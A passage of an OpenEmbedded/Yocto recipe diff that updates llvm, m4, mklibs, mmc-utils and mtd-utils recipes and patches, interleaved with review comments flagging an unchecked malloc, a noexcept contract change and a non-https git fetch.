+SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH};protocol=https \
file://0006-llvm-TargetLibraryInfo-Undefine-libc-functions-if-th.patch;striplevel=2 \
file://0007-llvm-allow-env-override-of-exe-path.patch;striplevel=2 \
- "
+ file://0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch;striplevel=2 \
+ "
UPSTREAM_CHECK_GITTAGREGEX = "llvmorg-(?P<pver>\d+(\.\d+)+)"
@@ -101,6 +102,11 @@ do_configure_prepend() {
sed -ri "s#lib/${LLVM_DIR}#${baselib}/${LLVM_DIR}#g" ${S}/tools/llvm-config/llvm-config.cpp
}
+# patch out build host paths for reproducibility
+do_compile_prepend_class-target() {
+ sed -i -e "s,${WORKDIR},,g" ${B}/tools/llvm-config/BuildVariables.inc
+}
+
do_compile() {
ninja -v ${PARALLEL_MAKE}
}
diff --git a/meta/recipes-devtools/m4/m4-1.4.18.inc b/meta/recipes-devtools/m4/m4-1.4.18.inc
index a9b63c1bf6..6475b02f8b 100644
--- a/meta/recipes-devtools/m4/m4-1.4.18.inc
+++ b/meta/recipes-devtools/m4/m4-1.4.18.inc
@@ -9,6 +9,7 @@ inherit autotools texinfo ptest
SRC_URI = "${GNU_MIRROR}/m4/m4-${PV}.tar.gz \
file://ac_config_links.patch \
file://m4-1.4.18-glibc-change-work-around.patch \
+ file://0001-c-stack-stop-using-SIGSTKSZ.patch \
"
SRC_URI_append_class-target = " file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
file://run-ptest \
diff --git a/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch b/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
new file mode 100644
index 0000000000..883b8a2075
--- /dev/null
+++ b/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
@@ -0,0 +1,84 @@
+From 69238f15129f35eb4756ad8e2004e0d7907cb175 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 30 Apr 2021 17:40:36 -0700
+Subject: [PATCH] c-stack: stop using SIGSTKSZ
+
+This patch is required with glibc 2.34+
+based on gnulib [1]
+
+[1] https://git.savannah.gnu.org/cgit/gnulib.git/commit/?id=f9e2b20a12a230efa30f1d479563ae07d276a94b
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ lib/c-stack.c | 22 +++++++++++++---------
+ 1 file changed, 13 insertions(+), 9 deletions(-)
+
+diff --git a/lib/c-stack.c b/lib/c-stack.c
+index 5353c08..863f764 100644
+--- a/lib/c-stack.c
++++ b/lib/c-stack.c
+@@ -51,13 +51,14 @@
+ typedef struct sigaltstack stack_t;
+ #endif
+ #ifndef SIGSTKSZ
+-# define SIGSTKSZ 16384
+-#elif HAVE_LIBSIGSEGV && SIGSTKSZ < 16384
++#define get_sigstksz() (16384)
++#elif HAVE_LIBSIGSEGV
+ /* libsigsegv 2.6 through 2.8 have a bug where some architectures use
+ more than the Linux default of an 8k alternate stack when deciding
+ if a fault was caused by stack overflow. */
+-# undef SIGSTKSZ
+-# define SIGSTKSZ 16384
++#define get_sigstksz() ((SIGSTKSZ) < 16384 ? 16384 : (SIGSTKSZ))
++#else
++#define get_sigstksz() ((SIGSTKSZ))
+ #endif
+
+ #include <stdlib.h>
+@@ -131,7 +132,8 @@ die (int signo)
+ /* Storage for the alternate signal stack. */
+ static union
+ {
+- char buffer[SIGSTKSZ];
++ /* allocate buffer with size from get_sigstksz() */
++ char *buffer;
+
+ /* These other members are for proper alignment. There's no
+ standard way to guarantee stack alignment, but this seems enough
+@@ -203,10 +205,11 @@ c_stack_action (void (*action) (int))
+ program_error_message = _("program error");
+ stack_overflow_message = _("stack overflow");
+
++ alternate_signal_stack.buffer = malloc(get_sigstksz());
+ /* Always install the overflow handler. */
+ if (stackoverflow_install_handler (overflow_handler,
+ alternate_signal_stack.buffer,
+- sizeof alternate_signal_stack.buffer))
++ get_sigstksz()))
+ {
+ errno = ENOTSUP;
+ return -1;
+@@ -279,14 +282,15 @@ c_stack_action (void (*action) (int))
+ stack_t st;
+ struct sigaction act;
+ st.ss_flags = 0;
++ alternate_signal_stack.buffer = malloc(get_sigstksz());
+ # if SIGALTSTACK_SS_REVERSED
+ /* Irix mistakenly treats ss_sp as the upper bound, rather than
+ lower bound, of the alternate stack. */
+- st.ss_sp = alternate_signal_stack.buffer + SIGSTKSZ - sizeof (void *);
+- st.ss_size = sizeof alternate_signal_stack.buffer - sizeof (void *);
++ st.ss_sp = alternate_signal_stack.buffer + get_sigstksz() - sizeof (void *);
++ st.ss_size = get_sigstksz() - sizeof (void *);
+ # else
+ st.ss_sp = alternate_signal_stack.buffer;
+- st.ss_size = sizeof alternate_signal_stack.buffer;
++ st.ss_size = get_sigstksz();
+ # endif
+ r = sigaltstack (&st, NULL);
+ if (r != 0)
+--
+2.31.1
+
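Review bot: Both added `alternate_signal_stack.buffer = malloc(get_sigstksz());` calls in c_stack_action() use the result unchecked, so an allocation failure hands a NULL stack to stackoverflow_install_handler() or sigaltstack(), and the SIGALTSTACK_SS_REVERSED branch does pointer arithmetic on it. Each call should be followed by `if (!alternate_signal_stack.buffer) { errno = ENOMEM; return -1; }`, matching the existing `return -1` error path. The buffer is allocated on every call and never freed, so a second call to c_stack_action() would leak the previous stack; allocating only while the pointer is still NULL avoids that. With `buffer` now a pointer, the union's alignment members no longer affect the stack memory, which relies on malloc's alignment instead, so the comment above them should say so. c_stack_action's body continues outside these inner hunks.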
diff --git a/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb b/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
index 92d5870f42..5910f4bc70 100644
--- a/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
+++ b/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Tool for creating device nodes"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833"
SECTION = "base"
diff --git a/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch b/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
new file mode 100644
index 0000000000..f96cc7d302
--- /dev/null
+++ b/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
@@ -0,0 +1,431 @@
+From 597c7a8333df84a87cc48fb8477b603ffbf372a6 Mon Sep 17 00:00:00 2001
+From: Andrej Valek <andrej.valek@siemens.com>
+Date: Mon, 23 Aug 2021 12:45:11 +0200
+Subject: [PATCH] feat(cpp17): remove deprecated exception specifications for
+ C++ 17
+
+Upstream-Status: Submitted [https://salsa.debian.org/installer-team/mklibs/-/merge_requests/2]
+
+based on: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0003r5.html
+
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+---
+ src/mklibs-readelf/elf.cpp | 48 ++++++++++++++++++++---------------------
+ src/mklibs-readelf/elf.hpp | 18 ++++++++--------
+ src/mklibs-readelf/elf_data.hpp | 36 +++++++++++++++----------------
+ 3 files changed, 51 insertions(+), 51 deletions(-)
+
+diff --git a/src/mklibs-readelf/elf.cpp b/src/mklibs-readelf/elf.cpp
+index 0e4c0f3..2e6d0f6 100644
+--- a/src/mklibs-readelf/elf.cpp
++++ b/src/mklibs-readelf/elf.cpp
+@@ -36,7 +36,7 @@ file::~file () throw ()
+ delete *it;
+ }
+
+-file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_error)
++file *file::open (const char *filename) throw ()
+ {
+ struct stat buf;
+ int fd;
+@@ -72,7 +72,7 @@ file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_erro
+ }
+
+ template<typename _class>
+-file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error)
++file *file::open_class(uint8_t *mem, size_t len) throw ()
+ {
+ switch (mem[EI_DATA])
+ {
+@@ -86,7 +86,7 @@ file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::run
+ }
+
+ template <typename _class, typename _data>
+-file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error)
++file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw ()
+ : file(mem, len)
+ {
+ if (mem[EI_CLASS] != _class::id)
+@@ -190,7 +190,7 @@ section_data<_class, _data>::section_data(Shdr *shdr, uint8_t *mem) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void section_data<_class, _data>::update(const file &file) throw (std::bad_alloc)
++void section_data<_class, _data>::update(const file &file) throw ()
+ {
+ const section_type<section_type_STRTAB> &section =
+ dynamic_cast<const section_type<section_type_STRTAB> &>(file.get_section(file.get_shstrndx()));
+@@ -204,7 +204,7 @@ section_type<section_type_DYNAMIC>::~section_type() throw ()
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_DYNAMIC)
+@@ -221,7 +221,7 @@ section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, ui
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -243,7 +243,7 @@ section_type<section_type_DYNSYM>::~section_type() throw ()
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_DYNSYM)
+@@ -260,7 +260,7 @@ section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uin
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update (file);
+
+@@ -285,7 +285,7 @@ const version_definition *section_type<section_type_GNU_VERDEF>::get_version_def
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_GNU_verdef)
+@@ -307,7 +307,7 @@ section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header,
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -333,7 +333,7 @@ const version_requirement_entry *section_type<section_type_GNU_VERNEED>::get_ver
+
+ template <typename _class, typename _data>
+ section_real<_class, _data, section_type_GNU_VERNEED>::
+-section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data> (header, mem)
+ {
+ if (this->type != SHT_GNU_verneed)
+@@ -355,7 +355,7 @@ section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -372,7 +372,7 @@ void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &f
+
+ template <typename _class, typename _data>
+ section_real<_class, _data, section_type_GNU_VERSYM>::
+-section_real (Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real (Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data> (header, mem)
+ {
+ if (this->type != SHT_GNU_versym)
+@@ -399,7 +399,7 @@ segment_data<_class, _data>::segment_data (Phdr *phdr, uint8_t *mem) throw ()
+ }
+
+ template <typename _class, typename _data>
+-segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw (std::bad_alloc)
++segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw ()
+ : segment_data<_class, _data> (header, mem)
+ {
+ if (this->type != PT_INTERP)
+@@ -429,13 +429,13 @@ dynamic_data<_class, _data>::dynamic_data (Dyn *dyn) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ if (is_string)
+ val_string = section.get_string(val);
+ }
+
+-std::string symbol::get_version () const throw (std::bad_alloc)
++std::string symbol::get_version () const throw ()
+ {
+ if (verneed)
+ return verneed->get_name();
+@@ -445,7 +445,7 @@ std::string symbol::get_version () const throw (std::bad_alloc)
+ return "Base";
+ }
+
+-std::string symbol::get_version_file () const throw (std::bad_alloc)
++std::string symbol::get_version_file () const throw ()
+ {
+ if (verneed)
+ return verneed->get_file();
+@@ -453,7 +453,7 @@ std::string symbol::get_version_file () const throw (std::bad_alloc)
+ return "None";
+ }
+
+-std::string symbol::get_name_version () const throw (std::bad_alloc)
++std::string symbol::get_name_version () const throw ()
+ {
+ std::string ver;
+
+@@ -478,13 +478,13 @@ symbol_data<_class, _data>::symbol_data (Sym *sym) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ name_string = section.get_string(name);
+ }
+
+ template <typename _class, typename _data>
+-void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw (std::bad_alloc)
++void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw ()
+ {
+ if (!file.get_section_GNU_VERSYM())
+ return;
+@@ -531,13 +531,13 @@ version_definition_data<_class, _data>::version_definition_data (Verdef *verdef)
+ }
+
+ template <typename _class, typename _data>
+-void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ for (std::vector<uint32_t>::iterator it = names.begin(); it != names.end(); ++it)
+ names_string.push_back(section.get_string(*it));
+ }
+
+-version_requirement::version_requirement() throw (std::bad_alloc)
++version_requirement::version_requirement() throw ()
+ : file_string("None")
+ { }
+
+@@ -561,7 +561,7 @@ version_requirement_data<_class, _data>::version_requirement_data (Verneed *vern
+
+ template <typename _class, typename _data>
+ void version_requirement_data<_class, _data>::
+-update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ file_string = section.get_string(file);
+
+@@ -596,7 +596,7 @@ version_requirement_entry_data(Vernaux *vna, const version_requirement &verneed)
+
+ template <typename _class, typename _data>
+ void version_requirement_entry_data<_class, _data>::
+-update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ name_string = section.get_string(name);
+ }
+diff --git a/src/mklibs-readelf/elf.hpp b/src/mklibs-readelf/elf.hpp
+index 70e61cd..afb0c9e 100644
+--- a/src/mklibs-readelf/elf.hpp
++++ b/src/mklibs-readelf/elf.hpp
+@@ -49,7 +49,7 @@ namespace Elf
+ const uint16_t get_shstrndx() const throw () { return shstrndx; }
+
+ const std::vector<section *> get_sections() const throw () { return sections; };
+- const section &get_section(unsigned int i) const throw (std::out_of_range) { return *sections.at(i); };
++ const section &get_section(unsigned int i) const throw () { return *sections.at(i); };
+ const section_type<section_type_DYNAMIC> *get_section_DYNAMIC() const throw () { return section_DYNAMIC; };
+ const section_type<section_type_DYNSYM> *get_section_DYNSYM() const throw () { return section_DYNSYM; };
+ const section_type<section_type_GNU_VERDEF> *get_section_GNU_VERDEF() const throw () { return section_GNU_VERDEF; };
+@@ -59,13 +59,13 @@ namespace Elf
+ const std::vector<segment *> get_segments() const throw () { return segments; };
+ const segment_type<segment_type_INTERP> *get_segment_INTERP() const throw () { return segment_INTERP; };
+
+- static file *open(const char *filename) throw (std::bad_alloc, std::runtime_error);
++ static file *open(const char *filename) throw ();
+
+ protected:
+- file(uint8_t *mem, size_t len) throw (std::bad_alloc) : mem(mem), len(len) { }
++ file(uint8_t *mem, size_t len) throw () : mem(mem), len(len) { }
+
+ template<typename _class>
+- static file *open_class(uint8_t *, size_t) throw (std::bad_alloc, std::runtime_error);
++ static file *open_class(uint8_t *, size_t) throw ();
+
+ uint16_t type;
+ uint16_t machine;
+@@ -128,7 +128,7 @@ namespace Elf
+ class section_type<section_type_STRTAB> : public virtual section
+ {
+ public:
+- std::string get_string(uint32_t offset) const throw (std::bad_alloc)
++ std::string get_string(uint32_t offset) const throw ()
+ {
+ return std::string(reinterpret_cast<const char *> (mem + offset));
+ }
+@@ -263,10 +263,10 @@ namespace Elf
+ uint8_t get_bind () const throw () { return bind; }
+ uint8_t get_type () const throw () { return type; }
+ const std::string &get_name_string() const throw () { return name_string; }
+- std::string get_version() const throw (std::bad_alloc);
+- std::string get_version_file() const throw (std::bad_alloc);
++ std::string get_version() const throw ();
++ std::string get_version_file() const throw ();
+ uint16_t get_version_data() const throw () { return versym; }
+- std::string get_name_version() const throw (std::bad_alloc);
++ std::string get_name_version() const throw ();
+
+ protected:
+ uint32_t name;
+@@ -305,7 +305,7 @@ namespace Elf
+ class version_requirement
+ {
+ public:
+- version_requirement() throw (std::bad_alloc);
++ version_requirement() throw ();
+ virtual ~version_requirement () throw () { }
+
+ const std::string &get_file() const throw () { return file_string; }
+diff --git a/src/mklibs-readelf/elf_data.hpp b/src/mklibs-readelf/elf_data.hpp
+index 05effee..3871982 100644
+--- a/src/mklibs-readelf/elf_data.hpp
++++ b/src/mklibs-readelf/elf_data.hpp
+@@ -94,7 +94,7 @@ namespace Elf
+ class file_data : public file
+ {
+ public:
+- file_data(uint8_t *, size_t len) throw (std::bad_alloc, std::runtime_error);
++ file_data(uint8_t *, size_t len) throw ();
+
+ const uint8_t get_class() const throw () { return _class::id; }
+ const uint8_t get_data() const throw () { return _data::id; }
+@@ -109,7 +109,7 @@ namespace Elf
+ public:
+ section_data(Shdr *, uint8_t *) throw ();
+
+- virtual void update(const file &) throw (std::bad_alloc);
++ virtual void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data, typename _type>
+@@ -133,9 +133,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -147,9 +147,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -161,9 +161,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -175,9 +175,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -189,7 +189,7 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -220,7 +220,7 @@ namespace Elf
+ typedef typename _elfdef<_class>::Phdr Phdr;
+
+ public:
+- segment_real (Phdr *, uint8_t *) throw (std::bad_alloc);
++ segment_real (Phdr *, uint8_t *) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -232,7 +232,7 @@ namespace Elf
+ public:
+ dynamic_data (Dyn *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -244,8 +244,8 @@ namespace Elf
+ public:
+ symbol_data (Sym *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
+- virtual void update_version (const file &, uint16_t) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
++ virtual void update_version (const file &, uint16_t) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -257,7 +257,7 @@ namespace Elf
+
+ version_definition_data (Verdef *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -269,7 +269,7 @@ namespace Elf
+
+ version_requirement_data (Verneed *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -280,7 +280,7 @@ namespace Elf
+
+ version_requirement_entry_data (Vernaux *, const version_requirement &) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+ }
+
+--
+2.11.0
+
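Review bot: Replacing each `throw (std::bad_alloc, ...)` with `throw ()` changes the contract rather than only removing deprecated syntax. `throw ()` declares that the function does not throw (in C++17 it is equivalent to `noexcept`), so an exception escaping one of these functions ends in std::terminate() instead of reaching the caller. This is visible in elf.hpp, where `get_section()` returns `*sections.at(i)` and `at()` throws std::out_of_range for a bad index; it presumably also affects `file::open` and the constructors that previously listed std::runtime_error. The old specifications should be dropped entirely, e.g. `const section &get_section(unsigned int i) const { return *sections.at(i); };` and `static file *open(const char *filename);`, keeping `throw ()` only on members that already had it. Assuming the callers catch these exceptions, a malformed ELF input would then still be reported as an error rather than aborting mklibs-readelf.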
diff --git a/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb b/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
index 1784af1f4c..07142e57e0 100644
--- a/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
+++ b/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
@@ -12,6 +12,7 @@ SRC_URI = "http://snapshot.debian.org/archive/debian/20180828T214102Z/pool/main/
file://avoid-failure-on-symbol-provided-by-application.patch \
file://show-GNU-unique-symbols-as-provided-symbols.patch \
file://fix_cross_compile.patch \
+ file://remove-deprecated-exception-specification-cpp17.patch \
"
SRC_URI[md5sum] = "6b6eeb9b4016c6a7317acc28c89e32cc"
diff --git a/meta/recipes-devtools/mmc/mmc-utils_git.bb b/meta/recipes-devtools/mmc/mmc-utils_git.bb
index 5fd1c5c0cd..8fe606915e 100644
--- a/meta/recipes-devtools/mmc/mmc-utils_git.bb
+++ b/meta/recipes-devtools/mmc/mmc-utils_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "Userspace tools for MMC/SD devices"
HOMEPAGE = "http://git.kernel.org/cgit/linux/kernel/git/cjb/mmc-utils.git/"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://mmc.c;beginline=1;endline=20;md5=fae32792e20f4d27ade1c5a762d16b7d"
diff --git a/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch b/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch
deleted file mode 100644
index d43f7e1a7a..0000000000
--- a/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From 4d19bffcfd66e25d3ee74536ae2d2da7ad52e8e2 Mon Sep 17 00:00:00 2001
-From: Barry Grussling <barry@grussling.com>
-Date: Sun, 12 Jan 2020 12:33:32 -0800
-Subject: [PATCH] mtd-utils: Fix return value of ubiformat
-Organization: O.S. Systems Software LTDA.
-
-This changeset fixes a feature regression in ubiformat. Older versions of
-ubiformat, when invoked with a flash-image, would return 0 in the case no error
-was encountered. Upon upgrading to latest, it was discovered that ubiformat
-returned 255 even without encountering an error condition.
-
-This changeset corrects the above issue and causes ubiformat, when given an
-image file, to return 0 when no errors are detected.
-
-Tested by running through my loading scripts and verifying ubiformat returned
-0.
-
-Upstream-Status: Backport [2.1.2]
-
-Signed-off-by: Barry Grussling <barry@grussling.com>
-Signed-off-by: David Oberhollenzer <david.oberhollenzer@sigma-star.at>
-Signed-off-by: Otavio Salvador <otavio@ossystems.com.br>
----
- ubi-utils/ubiformat.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/ubi-utils/ubiformat.c b/ubi-utils/ubiformat.c
-index a90627c..5377b12 100644
---- a/ubi-utils/ubiformat.c
-+++ b/ubi-utils/ubiformat.c
-@@ -550,6 +550,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
- struct ubi_vtbl_record *vtbl;
- int eb1 = -1, eb2 = -1;
- long long ec1 = -1, ec2 = -1;
-+ int ret = -1;
-
- write_size = UBI_EC_HDR_SIZE + mtd->subpage_size - 1;
- write_size /= mtd->subpage_size;
-@@ -643,8 +644,10 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
- if (!args.quiet && !args.verbose)
- printf("\n");
-
-- if (novtbl)
-+ if (novtbl) {
-+ ret = 0;
- goto out_free;
-+ }
-
- if (eb1 == -1 || eb2 == -1) {
- errmsg("no eraseblocks for volume table");
-@@ -669,7 +672,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
-
- out_free:
- free(hdr);
-- return -1;
-+ return ret;
- }
-
- int main(int argc, char * const argv[])
---
-2.27.0
-
diff --git a/meta/recipes-devtools/mtd/mtd-utils_git.bb b/meta/recipes-devtools/mtd/mtd-utils_git.bb
index d1658a739b..fa42770ee4 100644
--- a/meta/recipes-devtools/mtd/mtd-utils_git.bb
+++ b/meta/recipes-devtools/mtd/mtd-utils_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "Tools for managing memory technology devices"
HOMEPAGE = "http://www.linux-mtd.infradead.org/"
+DESCRIPTION = "mtd-utils tool is a generic Linux subsystem for memory devices, especially Flash devices."
SECTION = "base"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
@@ -10,18 +11,15 @@ inherit autotools pkgconfig update-alternatives
DEPENDS = "zlib e2fsprogs util-linux"
RDEPENDS_mtd-utils-tests += "bash"
-PV = "2.1.1"
+PV = "2.1.3"
-SRCREV = "4443221ce9b88440cd9f5bb78e6fe95621d36c8a"
-SRC_URI = "git://git.infradead.org/mtd-utils.git \
+SRCREV = "42ea7cd48d2b3c306d59bb6c530d79f8c25bf9f5"
+SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master \
file://add-exclusion-to-mkfs-jffs2-git-2.patch \
- file://0001-mtd-utils-Fix-return-value-of-ubiformat.patch \
-"
+ "
S = "${WORKDIR}/git/"
-EXTRA_OECONF += "--enable-install-tests"
-
# xattr support creates an additional compile-time dependency on acl because
# the sys/acl.h header is needed. libacl is not needed and thus enabling xattr
# regardless whether acl is enabled or disabled in the distro should be okay.
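Review bot: The new SRC_URI adds `branch=master` but still fetches over the unauthenticated `git://` transport, whereas the ninja and pkgconfig recipes in this same diff move to `protocol=https`. SRCREV pins the commit, so the fetched content is still tied to that hash, but a server-authenticated transport is the more consistent default; if the host serves the repository over HTTPS, the line could read `SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master;protocol=https \`. The hunk also drops `EXTRA_OECONF += "--enable-install-tests"` while `RDEPENDS_mtd-utils-tests` stays in context, so it is worth confirming that the tests package is still populated some other way (the rest of the recipe is outside this hunk).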
@@ -43,11 +41,9 @@ ALTERNATIVE_PRIORITY = "100"
ALTERNATIVE_${PN} = "flashcp flash_eraseall flash_lock flash_unlock nanddump nandwrite"
ALTERNATIVE_${PN}-ubifs = "ubiattach ubidetach ubimkvol ubirename ubirmvol ubirsvol ubiupdatevol"
-ALTERNATIVE_LINK_NAME[flash_eraseall] = "${sbindir}/flash_eraseall"
ALTERNATIVE_LINK_NAME[nandwrite] = "${sbindir}/nandwrite"
ALTERNATIVE_LINK_NAME[nanddump] = "${sbindir}/nanddump"
ALTERNATIVE_LINK_NAME[ubiattach] = "${sbindir}/ubiattach"
